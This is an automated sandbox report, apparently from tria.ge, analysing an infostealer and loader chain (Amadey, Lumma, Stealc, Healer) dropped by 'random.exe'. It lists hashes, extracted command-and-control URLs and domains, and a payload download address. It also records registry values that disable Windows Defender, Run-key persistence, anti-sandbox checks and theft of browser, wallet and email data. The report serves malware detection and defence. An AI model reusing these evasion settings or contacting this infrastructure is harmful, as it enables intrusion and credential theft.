Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
300s -
max time network
330s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
07/03/2025, 15:16
Static task
static1
Behavioral task
behavioral1
Sample
random.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
random.exe
Resource
win10ltsc2021-20250217-en
Behavioral task
behavioral3
Sample
random.exe
Resource
win11-20250217-en
General
-
Target
random.exe
-
Size
1.8MB
-
MD5
e25f93527c1781d2b55ff83860b0c92c
-
SHA1
6c01d61a4cd0c00d4c102206903553f263447064
-
SHA256
ea01f9a6f6683f4ea8248176a8b741e2be63c216c92cee15bc156e76a8760599
-
SHA512
2b5275a1e76eca33cac38cb22da31afbb5d3a414b3517632fe01f98b5a75618bd38431394c3ee11879dbbf8bae7ac998a74bd905012a2138a79e29548db4b0dc
-
SSDEEP
49152:ef+ZeL4wbrvcCvXVki2/OXDKdkROwLJUn2EDISQHyBj+:JeUAvXOmXDKdkRlSn2Oj
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://fostinjec.today/api
https://begindecafer.world/api
https://garagedrootz.top/api
https://modelshiverd.icu/api
https://arisechairedd.shop/api
https://6catterjur.run/api
https://orangemyther.live/api
https://sterpickced.digital/api
https://agroecologyguide.digital/api
https://explorebieology.run/api
https://kmoderzysics.top/api
https://seedsxouts.shop/api
https://rcodxefusion.top/api
https://farfinable.top/api
https://techspherxe.top/api
https://cropcircleforum.today/api
Extracted
stealc
traff1
-
url_path
/gtthfbsb2h.php
Extracted
lumma
https://agroecologyguide.digital/api
https://exarthynature.run/api
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 2 IoCs
resource yara_rule behavioral1/memory/4024-3073-0x0000000000EA0000-0x000000000116A000-memory.dmp healer behavioral1/memory/4024-3072-0x0000000000EA0000-0x000000000116A000-memory.dmp healer -
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 220a009b82.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 220a009b82.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 220a009b82.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 220a009b82.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 220a009b82.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection 220a009b82.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 220a009b82.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 220a009b82.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 220a009b82.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications 220a009b82.exe -
Stealc family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 340 created 1140 340 Seat.com 20 PID 340 created 1140 340 Seat.com 20 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 17 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ random.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 571017d6c6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempDHIF15WKYSZZZNVDPVNIJ3QHRQPBW9FQ.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 23a2f3c287.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 9fd60dd4c9.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 220a009b82.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ bncn6rv.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ yUI6F6C.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a7235313d4.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ CgmaT61.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 88521d4338.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d0a561e64d.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ bncn6rv.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b55bf75f19.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5eb3d17bf3.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 76 2532 powershell.exe 78 3184 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 17 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3184 powershell.exe 5004 powershell.exe 3168 powershell.exe 2672 powershell.exe 2532 powershell.exe 3184 powershell.exe 4384 powershell.exe 3168 powershell.exe 2672 powershell.exe 3184 powershell.exe 5004 powershell.exe 3956 powershell.exe 2116 powershell.exe 3460 powershell.exe 2692 powershell.exe 6116 powershell.exe 5092 powershell.exe -
Downloads MZ/PE file 39 IoCs
flow pid Process 31 2480 bncn6rv.exe 31 2480 bncn6rv.exe 31 2480 bncn6rv.exe 31 2480 bncn6rv.exe 31 2480 bncn6rv.exe 31 2480 bncn6rv.exe 31 2480 bncn6rv.exe 66 2336 rapes.exe 66 2336 rapes.exe 66 2336 rapes.exe 77 2336 rapes.exe 100 2952 BitLockerToGo.exe 64 3552 futors.exe 207 2336 rapes.exe 68 3552 futors.exe 72 4332 BitLockerToGo.exe 85 4728 BitLockerToGo.exe 187 2084 bncn6rv.exe 187 2084 bncn6rv.exe 187 2084 bncn6rv.exe 187 2084 bncn6rv.exe 187 2084 bncn6rv.exe 187 2084 bncn6rv.exe 187 2084 bncn6rv.exe 76 2532 powershell.exe 70 3696 BitLockerToGo.exe 34 2336 rapes.exe 78 3184 powershell.exe 5 2336 rapes.exe 5 2336 rapes.exe 5 2336 rapes.exe 5 2336 rapes.exe 81 2336 rapes.exe 81 2336 rapes.exe 81 2336 rapes.exe 81 2336 rapes.exe 81 2336 rapes.exe 12 2336 rapes.exe 15 2336 rapes.exe -
Uses browser remote debugging 2 TTPs 17 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 3220 chrome.exe 2988 chrome.exe 3872 chrome.exe 2520 chrome.exe 4272 chrome.exe 2584 chrome.exe 2476 chrome.exe 3360 chrome.exe 4052 chrome.exe 752 chrome.exe 3860 chrome.exe 3328 chrome.exe 2396 chrome.exe 852 chrome.exe 3192 chrome.exe 3700 chrome.exe 2504 chrome.exe -
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral1/files/0x000500000001dc59-3361.dat net_reactor behavioral1/memory/4484-3369-0x0000000000140000-0x00000000001A0000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 34 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 88521d4338.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion CgmaT61.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 23a2f3c287.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 571017d6c6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempDHIF15WKYSZZZNVDPVNIJ3QHRQPBW9FQ.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion bncn6rv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion bncn6rv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion yUI6F6C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 88521d4338.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a7235313d4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d0a561e64d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 220a009b82.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion bncn6rv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 571017d6c6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion yUI6F6C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b55bf75f19.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b55bf75f19.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion CgmaT61.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a7235313d4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5eb3d17bf3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 220a009b82.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempDHIF15WKYSZZZNVDPVNIJ3QHRQPBW9FQ.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5eb3d17bf3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9fd60dd4c9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d0a561e64d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion bncn6rv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 23a2f3c287.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9fd60dd4c9.exe -
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbs T0QdO0l.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url cmd.exe -
Executes dropped EXE 40 IoCs
pid Process 2336 rapes.exe 2892 HmngBpR.exe 1612 SplashWin.exe 1192 SplashWin.exe 1252 ADFoyxP.exe 340 Seat.com 2784 9hUDDVk.exe 560 pwHxMTy.exe 2224 pwHxMTy.exe 1312 T0QdO0l.exe 3136 amnew.exe 3552 futors.exe 2480 bncn6rv.exe 4888 packed.exe 4024 pered.exe 4072 COM Surrogate.exe 4628 23a2f3c287.exe 5068 PQkVDtx.exe 2444 571017d6c6.exe 3156 COM Surrogate.exe 3312 yUI6F6C.exe 2372 CgmaT61.exe 1992 35f0ddbec0.exe 380 TempDHIF15WKYSZZZNVDPVNIJ3QHRQPBW9FQ.EXE 4208 483d2fa8a0d53818306efeb32d3.exe 4536 GjThRAJ.exe 4528 a7235313d4.exe 2940 b55bf75f19.exe 4816 88521d4338.exe 3664 5eb3d17bf3.exe 3212 8096f0397d.exe 2512 8096f0397d.exe 980 9fd60dd4c9.exe 1836 d0a561e64d.exe 3108 TradeHub.com 1932 59249c90a1.exe 4024 220a009b82.exe 4960 PQkVDtx.exe 1456 packed.exe 2084 bncn6rv.exe -
Identifies Wine through registry keys 2 TTPs 17 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine 9fd60dd4c9.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine d0a561e64d.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine 220a009b82.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine random.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine bncn6rv.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine yUI6F6C.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine TempDHIF15WKYSZZZNVDPVNIJ3QHRQPBW9FQ.EXE Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine 88521d4338.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine bncn6rv.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine a7235313d4.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine b55bf75f19.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine 5eb3d17bf3.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine 23a2f3c287.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine 571017d6c6.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine CgmaT61.exe -
Loads dropped DLL 64 IoCs
pid Process 1628 random.exe 1628 random.exe 2336 rapes.exe 1612 SplashWin.exe 1612 SplashWin.exe 1612 SplashWin.exe 1612 SplashWin.exe 1192 SplashWin.exe 1192 SplashWin.exe 1192 SplashWin.exe 2336 rapes.exe 1656 cmd.exe 2336 rapes.exe 2336 rapes.exe 560 pwHxMTy.exe 1196 WerFault.exe 1196 WerFault.exe 1196 WerFault.exe 1196 WerFault.exe 340 Seat.com 1196 WerFault.exe 2336 rapes.exe 5052 WerFault.exe 5052 WerFault.exe 5052 WerFault.exe 5052 WerFault.exe 5052 WerFault.exe 2772 WerFault.exe 2772 WerFault.exe 2772 WerFault.exe 2772 WerFault.exe 2772 WerFault.exe 2336 rapes.exe 3136 amnew.exe 2336 rapes.exe 2336 rapes.exe 2336 rapes.exe 2480 bncn6rv.exe 2480 bncn6rv.exe 3552 futors.exe 3552 futors.exe 4888 packed.exe 4888 packed.exe 3552 futors.exe 3552 futors.exe 2336 rapes.exe 3552 futors.exe 3552 futors.exe 5068 PQkVDtx.exe 5068 PQkVDtx.exe 2336 rapes.exe 2336 rapes.exe 5000 WerFault.exe 5000 WerFault.exe 5000 WerFault.exe 2336 rapes.exe 2336 rapes.exe 2336 rapes.exe 3696 BitLockerToGo.exe 2532 powershell.exe 2532 powershell.exe 4332 BitLockerToGo.exe 3184 powershell.exe 3184 powershell.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 220a009b82.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features 220a009b82.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\9fd60dd4c9.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10126110101\\9fd60dd4c9.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\d0a561e64d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10126120101\\d0a561e64d.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\59249c90a1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10126130101\\59249c90a1.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\220a009b82.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10126140101\\220a009b82.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\23a2f3c287.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10019730101\\23a2f3c287.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\571017d6c6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10019740101\\571017d6c6.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\35f0ddbec0.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10125770101\\35f0ddbec0.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10125780121\\am_no.cmd" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000500000001d8ce-2580.dat autoit_exe behavioral1/files/0x000500000001da08-2882.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 4 IoCs
pid Process 852 tasklist.exe 940 tasklist.exe 5472 tasklist.exe 5508 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 17 IoCs
pid Process 1628 random.exe 2336 rapes.exe 2480 bncn6rv.exe 4628 23a2f3c287.exe 2444 571017d6c6.exe 3312 yUI6F6C.exe 2372 CgmaT61.exe 380 TempDHIF15WKYSZZZNVDPVNIJ3QHRQPBW9FQ.EXE 4208 483d2fa8a0d53818306efeb32d3.exe 4528 a7235313d4.exe 2940 b55bf75f19.exe 4816 88521d4338.exe 3664 5eb3d17bf3.exe 980 9fd60dd4c9.exe 1836 d0a561e64d.exe 4024 220a009b82.exe 2084 bncn6rv.exe -
Suspicious use of SetThreadContext 7 IoCs
description pid Process procid_target PID 1192 set thread context of 2912 1192 SplashWin.exe 36 PID 560 set thread context of 2224 560 pwHxMTy.exe 62 PID 4628 set thread context of 3696 4628 23a2f3c287.exe 106 PID 2444 set thread context of 4332 2444 571017d6c6.exe 117 PID 2940 set thread context of 4728 2940 b55bf75f19.exe 151 PID 4816 set thread context of 2952 4816 88521d4338.exe 152 PID 3212 set thread context of 2512 3212 8096f0397d.exe 154 -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files\runtime\COM Surrogate.exe packed.exe File opened for modification C:\Program Files\runtime\COM Surrogate.exe PQkVDtx.exe File created C:\Program Files\runtime\COM Surrogate.exe PQkVDtx.exe File created C:\Program Files\runtime\COM Surrogate.exe packed.exe -
Drops file in Windows directory 9 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job random.exe File opened for modification C:\Windows\PerfectlyFda ADFoyxP.exe File opened for modification C:\Windows\AccreditationShed ADFoyxP.exe File opened for modification C:\Windows\HighKerry ADFoyxP.exe File opened for modification C:\Windows\GovernmentsHighly ADFoyxP.exe File opened for modification C:\Windows\PracticalPrevent ADFoyxP.exe File opened for modification C:\Windows\FilenameWho ADFoyxP.exe File opened for modification C:\Windows\UpdatedMakeup ADFoyxP.exe File created C:\Windows\Tasks\futors.job amnew.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 10 IoCs
pid pid_target Process procid_target 1196 560 WerFault.exe 61 5052 2784 WerFault.exe 60 2772 1312 WerFault.exe 65 2744 1884 WerFault.exe 59 5000 3312 WerFault.exe 118 3396 3212 WerFault.exe 153 3880 2512 WerFault.exe 154 3732 4484 WerFault.exe 211 4824 2372 WerFault.exe 121 5896 5800 WerFault.exe 258 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8096f0397d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pwHxMTy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CgmaT61.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 35f0ddbec0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a7235313d4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pwHxMTy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 571017d6c6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b55bf75f19.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TradeHub.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 88521d4338.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Seat.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 23a2f3c287.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8096f0397d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 220a009b82.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language random.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9hUDDVk.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9fd60dd4c9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language expand.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language T0QdO0l.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bncn6rv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
